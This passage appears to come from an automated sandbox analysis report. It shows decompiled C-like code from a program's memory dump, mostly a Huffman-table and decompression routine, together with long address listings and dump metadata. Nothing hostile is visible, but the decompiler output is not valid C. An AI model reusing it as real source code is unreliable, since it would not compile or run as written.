                                                                                                                                                                                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                                                                                                                          												__esi[2] = __esi[2] + 1;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L94:
                                                                                                                                                                                                          											__eax = __esi[1];
                                                                                                                                                                                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                                                                                                                          											__edi = __eax;
                                                                                                                                                                                                          											__eax = __eax >> 5;
                                                                                                                                                                                                          											__edi = __edi & 0x0000001f;
                                                                                                                                                                                                          											__ecx = 0x101;
                                                                                                                                                                                                          											__eax = __eax & 0x0000001f;
                                                                                                                                                                                                          											__edi = __edi + 0x101;
                                                                                                                                                                                                          											__eax = __eax + 1;
                                                                                                                                                                                                          											__edx = __ebp - 0xc;
                                                                                                                                                                                                          											 *(__ebp - 0x14) = __eax;
                                                                                                                                                                                                          											 &(__esi[0x148]) = __ebp - 4;
                                                                                                                                                                                                          											 *(__ebp - 4) = 9;
                                                                                                                                                                                                          											__ebp - 0x18 =  &(__esi[3]);
                                                                                                                                                                                                          											 *(__ebp - 0x10) = 6;
                                                                                                                                                                                                          											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                                                                                                          											__eflags =  *(__ebp - 4);
                                                                                                                                                                                                          											if( *(__ebp - 4) == 0) {
                                                                                                                                                                                                          												__eax = __eax | 0xffffffff;
                                                                                                                                                                                                          												__eflags = __eax;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = __eax;
                                                                                                                                                                                                          											if(__eax != 0) {
                                                                                                                                                                                                          												goto L9;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												L97:
                                                                                                                                                                                                          												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                                                                                                                          												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                                                                                                                          												__eax = __esi + 0xc + __edi * 4;
                                                                                                                                                                                                          												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                                                                                                          												__eflags = __eax;
                                                                                                                                                                                                          												if(__eax != 0) {
                                                                                                                                                                                                          													goto L9;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L98:
                                                                                                                                                                                                          												__eax =  *(__ebp - 0x10);
                                                                                                                                                                                                          												__eflags =  *(__ebp - 0x10);
                                                                                                                                                                                                          												if( *(__ebp - 0x10) != 0) {
                                                                                                                                                                                                          													L100:
                                                                                                                                                                                                          													__cl =  *(__ebp - 4);
                                                                                                                                                                                                          													 *__esi =  *__esi & 0x00000000;
                                                                                                                                                                                                          													__eflags =  *__esi;
                                                                                                                                                                                                          													__esi[4] = __al;
                                                                                                                                                                                                          													__eax =  *(__ebp - 0x18);
                                                                                                                                                                                                          													__esi[5] =  *(__ebp - 0x18);
                                                                                                                                                                                                          													__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                          													__esi[4] = __cl;
                                                                                                                                                                                                          													__esi[6] =  *(__ebp - 0x1c);
                                                                                                                                                                                                          													goto L101;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L99:
                                                                                                                                                                                                          												__eflags = __edi - 0x101;
                                                                                                                                                                                                          												if(__edi > 0x101) {
                                                                                                                                                                                                          													goto L9;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L100;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										case 0xe:
                                                                                                                                                                                                          											goto L9;
                                                                                                                                                                                                          										case 0xf:
                                                                                                                                                                                                          											L175:
                                                                                                                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                                                                                                                          											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                                                                                          											__ecx = __esi[0x26ea];
                                                                                                                                                                                                          											__edx = __esi[0x26e9];
                                                                                                                                                                                                          											__eflags = __ecx - __edx;
                                                                                                                                                                                                          											 *(__ebp - 0x30) = __ecx;
                                                                                                                                                                                                          											if(__ecx >= __edx) {
                                                                                                                                                                                                          												__eax = __esi[0x26e8];
                                                                                                                                                                                                          												__eax = __esi[0x26e8] - __ecx;
                                                                                                                                                                                                          												__eflags = __eax;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__edx = __edx - __ecx;
                                                                                                                                                                                                          												__eax = __edx - __ecx - 1;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = __ecx - __edx;
                                                                                                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                          											if(__ecx != __edx) {
                                                                                                                                                                                                          												L183:
                                                                                                                                                                                                          												__edi = 0;
                                                                                                                                                                                                          												goto L10;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												L179:
                                                                                                                                                                                                          												__eax = __esi[0x145];
                                                                                                                                                                                                          												__eflags = __eax - 8;
                                                                                                                                                                                                          												 *__esi = __eax;
                                                                                                                                                                                                          												if(__eax != 8) {
                                                                                                                                                                                                          													L184:
                                                                                                                                                                                                          													0 = 1;
                                                                                                                                                                                                          													goto L10;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L180;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L181:
                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L70:
                                                                                                                                                                                                          							if( *__edi == __eax) {
                                                                                                                                                                                                          								goto L72;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L71:
                                                                                                                                                                                                          							__esi[2] = __esi[2] & __eax;
                                                                                                                                                                                                          							 *__esi = 0xd;
                                                                                                                                                                                                          							goto L93;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L182:
                                                                                                                                                                                                          				_t443 = 0;
                                                                                                                                                                                                          				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                                                                                                          				_t446[0x146] = _t425;
                                                                                                                                                                                                          				( *(_t448 + 8))[1] = 0;
                                                                                                                                                                                                          				goto L11;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          0x00406e03
                                                                                                                                                                                                          0x00406e0b
                                                                                                                                                                                                          0x00406e0e
                                                                                                                                                                                                          0x00406e11
                                                                                                                                                                                                          0x00406e14
                                                                                                                                                                                                          0x00406e18
                                                                                                                                                                                                          0x00406e1b
                                                                                                                                                                                                          0x00406e1d
                                                                                                                                                                                                          0x00406e20
                                                                                                                                                                                                          0x00406e22
                                                                                                                                                                                                          0x00406e36
                                                                                                                                                                                                          0x00406e36
                                                                                                                                                                                                          0x00406e39
                                                                                                                                                                                                          0x00406e53
                                                                                                                                                                                                          0x00406e53
                                                                                                                                                                                                          0x00406e56
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e5c
                                                                                                                                                                                                          0x00406e5c
                                                                                                                                                                                                          0x00406e5f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e65
                                                                                                                                                                                                          0x00406e65
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e65
                                                                                                                                                                                                          0x00406e3b
                                                                                                                                                                                                          0x00406e3e
                                                                                                                                                                                                          0x00406e45
                                                                                                                                                                                                          0x00406e48
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e48
                                                                                                                                                                                                          0x00406e24
                                                                                                                                                                                                          0x00406e28
                                                                                                                                                                                                          0x00406e2b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e70
                                                                                                                                                                                                          0x00406e70
                                                                                                                                                                                                          0x00406e95
                                                                                                                                                                                                          0x00406e95
                                                                                                                                                                                                          0x00406e95
                                                                                                                                                                                                          0x00406e97
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e75
                                                                                                                                                                                                          0x00406e75
                                                                                                                                                                                                          0x00406e79
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406e7f
                                                                                                                                                                                                          0x00406e7f
                                                                                                                                                                                                          0x00406e82
                                                                                                                                                                                                          0x00406e85
                                                                                                                                                                                                          0x00406e88
                                                                                                                                                                                                          0x00406e8a
                                                                                                                                                                                                          0x00406e8c
                                                                                                                                                                                                          0x00406e8f
                                                                                                                                                                                                          0x00406e92
                                                                                                                                                                                                          0x00406e92
                                                                                                                                                                                                          0x00406e92
                                                                                                                                                                                                          0x00406e99
                                                                                                                                                                                                          0x00406ea1
                                                                                                                                                                                                          0x00406ea4
                                                                                                                                                                                                          0x00406ea7
                                                                                                                                                                                                          0x00406ea9
                                                                                                                                                                                                          0x00406eac
                                                                                                                                                                                                          0x00406eac
                                                                                                                                                                                                          0x00406eae
                                                                                                                                                                                                          0x00406eb2
                                                                                                                                                                                                          0x00406eb5
                                                                                                                                                                                                          0x00406eb8
                                                                                                                                                                                                          0x00406ebb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406ec1
                                                                                                                                                                                                          0x00406ec1
                                                                                                                                                                                                          0x00406ee6
                                                                                                                                                                                                          0x00406ee6
                                                                                                                                                                                                          0x00406ee6
                                                                                                                                                                                                          0x00406ee8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406ec6
                                                                                                                                                                                                          0x00406ec6
                                                                                                                                                                                                          0x00406eca
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406ed0
                                                                                                                                                                                                          0x00406ed0
                                                                                                                                                                                                          0x00406ed3
                                                                                                                                                                                                          0x00406ed6
                                                                                                                                                                                                          0x00406ed9
                                                                                                                                                                                                          0x00406edb
                                                                                                                                                                                                          0x00406edd
                                                                                                                                                                                                          0x00406ee0
                                                                                                                                                                                                          0x00406ee3
                                                                                                                                                                                                          0x00406ee3
                                                                                                                                                                                                          0x00406ee3
                                                                                                                                                                                                          0x00406eea
                                                                                                                                                                                                          0x00406eea
                                                                                                                                                                                                          0x00406ef2
                                                                                                                                                                                                          0x00406ef5
                                                                                                                                                                                                          0x00406ef8
                                                                                                                                                                                                          0x00406efb
                                                                                                                                                                                                          0x00406eff
                                                                                                                                                                                                          0x00406f02
                                                                                                                                                                                                          0x00406f04
                                                                                                                                                                                                          0x00406f07
                                                                                                                                                                                                          0x00406f0a
                                                                                                                                                                                                          0x00406f24
                                                                                                                                                                                                          0x00406f24
                                                                                                                                                                                                          0x00406f27
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406f2d
                                                                                                                                                                                                          0x00406f2d
                                                                                                                                                                                                          0x00406f30
                                                                                                                                                                                                          0x00406f37
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406f37
                                                                                                                                                                                                          0x00406f0c
                                                                                                                                                                                                          0x00406f0f
                                                                                                                                                                                                          0x00406f16
                                                                                                                                                                                                          0x00406f19
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406f3f
                                                                                                                                                                                                          0x00406f3f
                                                                                                                                                                                                          0x00406f64
                                                                                                                                                                                                          0x004070ec
                                                                                                                                                                                                          0x004070f2
                                                                                                                                                                                                          0x004070f2
                                                                                                                                                                                                          0x004070e5
                                                                                                                                                                                                          0x004070e7
                                                                                                                                                                                                          0x004070e9
                                                                                                                                                                                                          0x004070e9
                                                                                                                                                                                                          0x004070f4
                                                                                                                                                                                                          0x004070fa
                                                                                                                                                                                                          0x004070fc
                                                                                                                                                                                                          0x004070ff
                                                                                                                                                                                                          0x00407101
                                                                                                                                                                                                          0x00407107
                                                                                                                                                                                                          0x00407109
                                                                                                                                                                                                          0x0040710b
                                                                                                                                                                                                          0x0040710d
                                                                                                                                                                                                          0x0040710f
                                                                                                                                                                                                          0x00407112
                                                                                                                                                                                                          0x0040711b
                                                                                                                                                                                                          0x0040711e
                                                                                                                                                                                                          0x0040711e
                                                                                                                                                                                                          0x00407114
                                                                                                                                                                                                          0x00407114
                                                                                                                                                                                                          0x00407117
                                                                                                                                                                                                          0x00407117
                                                                                                                                                                                                          0x00407112
                                                                                                                                                                                                          0x00407109
                                                                                                                                                                                                          0x00407120
                                                                                                                                                                                                          0x00407122
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407122
                                                                                                                                                                                                          0x004070a1
                                                                                                                                                                                                          0x004070a1
                                                                                                                                                                                                          0x004070a7
                                                                                                                                                                                                          0x004070ad
                                                                                                                                                                                                          0x004070af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004070b1
                                                                                                                                                                                                          0x004070b1
                                                                                                                                                                                                          0x004070b3
                                                                                                                                                                                                          0x004070b5
                                                                                                                                                                                                          0x004070bc
                                                                                                                                                                                                          0x004070bc
                                                                                                                                                                                                          0x004070be
                                                                                                                                                                                                          0x004070b7
                                                                                                                                                                                                          0x004070b7
                                                                                                                                                                                                          0x004070b9
                                                                                                                                                                                                          0x004070b9
                                                                                                                                                                                                          0x004070c0
                                                                                                                                                                                                          0x004070c2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040713a
                                                                                                                                                                                                          0x0040713a
                                                                                                                                                                                                          0x0040713d
                                                                                                                                                                                                          0x0040713f
                                                                                                                                                                                                          0x00407142
                                                                                                                                                                                                          0x00407145
                                                                                                                                                                                                          0x00407145
                                                                                                                                                                                                          0x00407145
                                                                                                                                                                                                          0x00407145
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004067f3
                                                                                                                                                                                                          0x004067d7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004067dd
                                                                                                                                                                                                          0x004067e0
                                                                                                                                                                                                          0x004067ea
                                                                                                                                                                                                          0x004067ed
                                                                                                                                                                                                          0x004067f0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004067f0
                                                                                                                                                                                                          0x004067d7
                                                                                                                                                                                                          0x004067fb
                                                                                                                                                                                                          0x004067fe
                                                                                                                                                                                                          0x00406802
                                                                                                                                                                                                          0x0040680c
                                                                                                                                                                                                          0x00406816
                                                                                                                                                                                                          0x00406819
                                                                                                                                                                                                          0x0040681f
                                                                                                                                                                                                          0x00406953
                                                                                                                                                                                                          0x00406955
                                                                                                                                                                                                          0x0040695b
                                                                                                                                                                                                          0x0040695e
                                                                                                                                                                                                          0x00406961
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406961
                                                                                                                                                                                                          0x00406825
                                                                                                                                                                                                          0x00406825
                                                                                                                                                                                                          0x00406826
                                                                                                                                                                                                          0x0040687e
                                                                                                                                                                                                          0x0040687e
                                                                                                                                                                                                          0x00406885
                                                                                                                                                                                                          0x0040692b
                                                                                                                                                                                                          0x0040692b
                                                                                                                                                                                                          0x00406930
                                                                                                                                                                                                          0x00406933
                                                                                                                                                                                                          0x00406938
                                                                                                                                                                                                          0x0040693b
                                                                                                                                                                                                          0x00406940
                                                                                                                                                                                                          0x00406943
                                                                                                                                                                                                          0x00406948
                                                                                                                                                                                                          0x0040694b
                                                                                                                                                                                                          0x0040694b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040688b
                                                                                                                                                                                                          0x0040688b
                                                                                                                                                                                                          0x0040688b
                                                                                                                                                                                                          0x0040688b
                                                                                                                                                                                                          0x0040688f
                                                                                                                                                                                                          0x0040688f
                                                                                                                                                                                                          0x004068b1
                                                                                                                                                                                                          0x004068b4
                                                                                                                                                                                                          0x004068b6
                                                                                                                                                                                                          0x004068b9
                                                                                                                                                                                                          0x004068be
                                                                                                                                                                                                          0x00406894
                                                                                                                                                                                                          0x00406894
                                                                                                                                                                                                          0x00406899
                                                                                                                                                                                                          0x0040689b
                                                                                                                                                                                                          0x0040689d
                                                                                                                                                                                                          0x004068a2
                                                                                                                                                                                                          0x004069e8
                                                                                                                                                                                                          0x004069ea
                                                                                                                                                                                                          0x004069ea
                                                                                                                                                                                                          0x004069f1
                                                                                                                                                                                                          0x004069f3
                                                                                                                                                                                                          0x004069f6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406afa
                                                                                                                                                                                                          0x00406afd
                                                                                                                                                                                                          0x00406b00
                                                                                                                                                                                                          0x00406b06
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                                          0x00406ce0
                                                                                                                                                                                                          0x00406ce3
                                                                                                                                                                                                          0x00406ce5
                                                                                                                                                                                                          0x00406ce8
                                                                                                                                                                                                          0x00406cee
                                                                                                                                                                                                          0x00406cf5
                                                                                                                                                                                                          0x00406cf7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bcb
                                                                                                                                                                                                          0x00406bcb
                                                                                                                                                                                                          0x00406bf3
                                                                                                                                                                                                          0x00406bf3
                                                                                                                                                                                                          0x00406bf3
                                                                                                                                                                                                          0x00406bf5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bd3
                                                                                                                                                                                                          0x00406bd3
                                                                                                                                                                                                          0x00406bd7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bdd
                                                                                                                                                                                                          0x00406bdd
                                                                                                                                                                                                          0x00406be0
                                                                                                                                                                                                          0x00406be3
                                                                                                                                                                                                          0x00406be6
                                                                                                                                                                                                          0x00406be8
                                                                                                                                                                                                          0x00406bea
                                                                                                                                                                                                          0x00406bed
                                                                                                                                                                                                          0x00406bf0
                                                                                                                                                                                                          0x00406bf0
                                                                                                                                                                                                          0x00406bf0
                                                                                                                                                                                                          0x00406bf7
                                                                                                                                                                                                          0x00406bf7
                                                                                                                                                                                                          0x00406bff
                                                                                                                                                                                                          0x00406c02
                                                                                                                                                                                                          0x00406c08
                                                                                                                                                                                                          0x00406c0b
                                                                                                                                                                                                          0x00406c0f
                                                                                                                                                                                                          0x00406c13
                                                                                                                                                                                                          0x00406c16
                                                                                                                                                                                                          0x00406c19
                                                                                                                                                                                                          0x00406c31
                                                                                                                                                                                                          0x00406c31
                                                                                                                                                                                                          0x00406c34
                                                                                                                                                                                                          0x00406c42
                                                                                                                                                                                                          0x00406c45
                                                                                                                                                                                                          0x00406c36
                                                                                                                                                                                                          0x00406c36
                                                                                                                                                                                                          0x00406c38
                                                                                                                                                                                                          0x00406c3f
                                                                                                                                                                                                          0x00406c3f
                                                                                                                                                                                                          0x00406c6e
                                                                                                                                                                                                          0x00406c6e
                                                                                                                                                                                                          0x00406c6e
                                                                                                                                                                                                          0x00406c71
                                                                                                                                                                                                          0x00406c73
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406c4e
                                                                                                                                                                                                          0x00406c4e
                                                                                                                                                                                                          0x00406c52
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406c58
                                                                                                                                                                                                          0x00406c58
                                                                                                                                                                                                          0x00406c5b
                                                                                                                                                                                                          0x00406c5e
                                                                                                                                                                                                          0x00406c61
                                                                                                                                                                                                          0x00406c63
                                                                                                                                                                                                          0x00406c65
                                                                                                                                                                                                          0x00406c68
                                                                                                                                                                                                          0x00406c6b
                                                                                                                                                                                                          0x00406c6b
                                                                                                                                                                                                          0x00406c6b
                                                                                                                                                                                                          0x00406c75
                                                                                                                                                                                                          0x00406c75
                                                                                                                                                                                                          0x00406c77
                                                                                                                                                                                                          0x00406c79
                                                                                                                                                                                                          0x00406c84
                                                                                                                                                                                                          0x00406c87
                                                                                                                                                                                                          0x00406c8a
                                                                                                                                                                                                          0x00406c8c
                                                                                                                                                                                                          0x00406c8e
                                                                                                                                                                                                          0x00406c90
                                                                                                                                                                                                          0x00406c93
                                                                                                                                                                                                          0x00406c96
                                                                                                                                                                                                          0x00406c9b
                                                                                                                                                                                                          0x00406c9e
                                                                                                                                                                                                          0x00406ca1
                                                                                                                                                                                                          0x00406ca4
                                                                                                                                                                                                          0x00406cab
                                                                                                                                                                                                          0x00406cae
                                                                                                                                                                                                          0x00406cb0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cb6
                                                                                                                                                                                                          0x00406cb6
                                                                                                                                                                                                          0x00406cba
                                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                                          0x00406ccd
                                                                                                                                                                                                          0x00406ccd
                                                                                                                                                                                                          0x00406cd1
                                                                                                                                                                                                          0x00406cd1

Memory Dump Source
• Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				unsigned int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				intOrPtr* _v32;
                                                                                                                                                                                                          				signed int* _v36;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                          				void _v116;
                                                                                                                                                                                                          				signed int _v176;
                                                                                                                                                                                                          				signed int _v180;
                                                                                                                                                                                                          				signed int _v240;
                                                                                                                                                                                                          				signed int _t166;
                                                                                                                                                                                                          				signed int _t168;
                                                                                                                                                                                                          				intOrPtr _t175;
                                                                                                                                                                                                          				signed int _t181;
                                                                                                                                                                                                          				void* _t182;
                                                                                                                                                                                                          				intOrPtr _t183;
                                                                                                                                                                                                          				signed int* _t184;
                                                                                                                                                                                                          				signed int _t186;
                                                                                                                                                                                                          				signed int _t187;
                                                                                                                                                                                                          				signed int* _t189;
                                                                                                                                                                                                          				signed int _t190;
                                                                                                                                                                                                          				intOrPtr* _t191;
                                                                                                                                                                                                          				intOrPtr _t192;
                                                                                                                                                                                                          				signed int _t193;
                                                                                                                                                                                                          				signed int _t195;
                                                                                                                                                                                                          				signed int _t200;
                                                                                                                                                                                                          				signed int _t205;
                                                                                                                                                                                                          				void* _t207;
                                                                                                                                                                                                          				short _t208;
                                                                                                                                                                                                          				signed char _t222;
                                                                                                                                                                                                          				signed int _t224;
                                                                                                                                                                                                          				signed int _t225;
                                                                                                                                                                                                          				signed int* _t232;
                                                                                                                                                                                                          				signed int _t233;
                                                                                                                                                                                                          				signed int _t234;
                                                                                                                                                                                                          				void* _t235;
                                                                                                                                                                                                          				signed int _t236;
                                                                                                                                                                                                          				signed int _t244;
                                                                                                                                                                                                          				signed int _t246;
                                                                                                                                                                                                          				signed int _t251;
                                                                                                                                                                                                          				signed int _t254;
                                                                                                                                                                                                          				signed int _t256;
                                                                                                                                                                                                          				signed int _t259;
                                                                                                                                                                                                          				signed int _t262;
                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                          				void* _t264;
                                                                                                                                                                                                          				signed int _t267;
                                                                                                                                                                                                          				intOrPtr _t269;
                                                                                                                                                                                                          				intOrPtr _t271;
                                                                                                                                                                                                          				signed int _t274;
                                                                                                                                                                                                          				intOrPtr* _t275;
                                                                                                                                                                                                          				unsigned int _t276;
                                                                                                                                                                                                          				void* _t277;
                                                                                                                                                                                                          				signed int _t278;
                                                                                                                                                                                                          				intOrPtr* _t279;
                                                                                                                                                                                                          				signed int _t281;
                                                                                                                                                                                                          				intOrPtr _t282;
                                                                                                                                                                                                          				intOrPtr _t283;
                                                                                                                                                                                                          				signed int* _t284;
                                                                                                                                                                                                          				signed int _t286;
                                                                                                                                                                                                          				signed int _t287;
                                                                                                                                                                                                          				signed int _t288;
                                                                                                                                                                                                          				signed int _t296;
                                                                                                                                                                                                          				signed int* _t297;
                                                                                                                                                                                                          				intOrPtr _t298;
                                                                                                                                                                                                          				void* _t299;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t278 = _a8;
                                                                                                                                                                                                          				_t187 = 0x10;
                                                                                                                                                                                                          				memset( &_v116, 0, _t187 << 2);
                                                                                                                                                                                                          				_t189 = _a4;
                                                                                                                                                                                                          				_t233 = _t278;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t166 =  *_t189;
                                                                                                                                                                                                          					_t189 =  &(_t189[1]);
                                                                                                                                                                                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                                                                                                                          					_t233 = _t233 - 1;
                                                                                                                                                                                                          				} while (_t233 != 0);
                                                                                                                                                                                                          				if(_v116 != _t278) {
                                                                                                                                                                                                          					_t279 = _a28;
                                                                                                                                                                                                          					_t267 =  *_t279;
                                                                                                                                                                                                          					_t190 = 1;
                                                                                                                                                                                                          					_a28 = _t267;
                                                                                                                                                                                                          					_t234 = 0xf;
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_t168 = 0;
                                                                                                                                                                                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t190 = _t190 + 1;
                                                                                                                                                                                                          						if(_t190 <= _t234) {
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v8 = _t190;
                                                                                                                                                                                                          					if(_t267 < _t190) {
                                                                                                                                                                                                          						_a28 = _t190;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                                                                                                                          						_t234 = _t234 - 1;
                                                                                                                                                                                                          						if(_t234 != 0) {
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v28 = _t234;
                                                                                                                                                                                                          					if(_a28 > _t234) {
                                                                                                                                                                                                          						_a28 = _t234;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *_t279 = _a28;
                                                                                                                                                                                                          					_t181 = 1 << _t190;
                                                                                                                                                                                                          					while(_t190 < _t234) {
                                                                                                                                                                                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                                                                                                                          						if(_t182 < 0) {
                                                                                                                                                                                                          							L64:
                                                                                                                                                                                                          							return _t168 | 0xffffffff;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t190 = _t190 + 1;
                                                                                                                                                                                                          						_t181 = _t182 + _t182;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t281 = _t234 << 2;
                                                                                                                                                                                                          					_t191 = _t299 + _t281 - 0x70;
                                                                                                                                                                                                          					_t269 =  *_t191;
                                                                                                                                                                                                          					_t183 = _t181 - _t269;
                                                                                                                                                                                                          					_v52 = _t183;
                                                                                                                                                                                                          					if(_t183 < 0) {
                                                                                                                                                                                                          						goto L64;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v176 = _t168;
                                                                                                                                                                                                          					 *_t191 = _t269 + _t183;
                                                                                                                                                                                                          					_t192 = 0;
